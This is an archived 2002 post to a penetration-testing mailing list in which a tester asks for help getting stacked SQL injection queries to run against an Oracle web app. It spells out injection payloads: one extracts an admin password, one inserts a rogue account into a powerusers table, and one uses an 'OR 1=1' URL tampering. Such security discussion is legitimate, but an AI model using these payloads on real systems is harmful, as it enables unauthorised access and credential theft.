SQL Injection
From: Qyves (zqyves@netscape.net)Date: 06/11/02
- Previous message: Biju Mukund: "Pen test of Online Lottery Systems"
- Next in thread: Chris Humphries: "Re: SQL Injection"
- Reply: Chris Humphries: "Re: SQL Injection"
- Reply: Kevin Spett: "Re: SQL Injection"
- Reply: Breidenbach, Beth: "RE: SQL Injection"
- Reply: Breidenbach, Beth: "RE: SQL Injection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 11 Jun 2002 04:30:48 -0400 From: zqyves@netscape.net (Qyves) To: pen-test@securityfocus.com
Hello all,
Last time this was denied on pen-test due to cross-posting issues.
I am currently pen-testing a web app and I am stuck in trying to execute two queries sequentially in Oracle.
To my knowledge I can do this in SQL by separating the two queries with ; however this is no happening in my case in two circumstances...
Here goes the history:
Case1:
I have a discovered an injectable sql query that is fed its data from a web form, the end query build by a cgi-script being
something along those lines:
(insert into tab_nam values ('a','b','c','d','e')); - a-e values from the web form- with me being able to inject through
concatenation and subqueries between any of those fields a SELECT query.
e.g.
e='||select password from users where username='adm'||'
query=(insert into tab_nam values ('a','b','c','d',''||select password from users where username='adm'||''));
I tried an INSERT to no avail, fair enough since I don't thing that INSERTs are allowed in nested queries... (or are they??)
The last characters added by the cgi script are the ));
e.g.
e=aa')); (insert into powerusers values ('test', 'pwd
^^-- This gets around the NULL value insertion problem
query=(insert into tab_nam values ('a','b','c','d','aa')); (insert into powerusers values ('test', 'pwd'));
Those two queries should be executed sequentially but Oracle conplains with an Invalid character error
Case 2:
I have also found a second query I can insert to and parts of it are actually shown raw in the URL as an input to a servlet
script e.g. /stupid.cgi?A=123%20AND%20%ID=101
This query appers to be something in the form of:
SELECT foo from bar where [URL] ;
I can inject an OR 1=1 in the above Url and get all the rows... However when I try the sequential queries again I fail
miserably url=/stupid.cgi?A=123%20AND%20%ID=101%20OR%201=1
original url=/stupidservlet?A=123%20AND%20%ID=101
modified url=/stupidservlet?A=123%20AND%20%ID=101; insert into powerusers values ('test', 'pwd)
I have full control over the url however I get just a "Server Error" back.
Any clues on how to make any of these methods work anyone??
Thanks in advance.
Qyves
__________________________________________________________________
Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/
Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
- Previous message: Biju Mukund: "Pen test of Online Lottery Systems"
- Next in thread: Chris Humphries: "Re: SQL Injection"
- Reply: Chris Humphries: "Re: SQL Injection"
- Reply: Kevin Spett: "Re: SQL Injection"
- Reply: Breidenbach, Beth: "RE: SQL Injection"
- Reply: Breidenbach, Beth: "RE: SQL Injection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
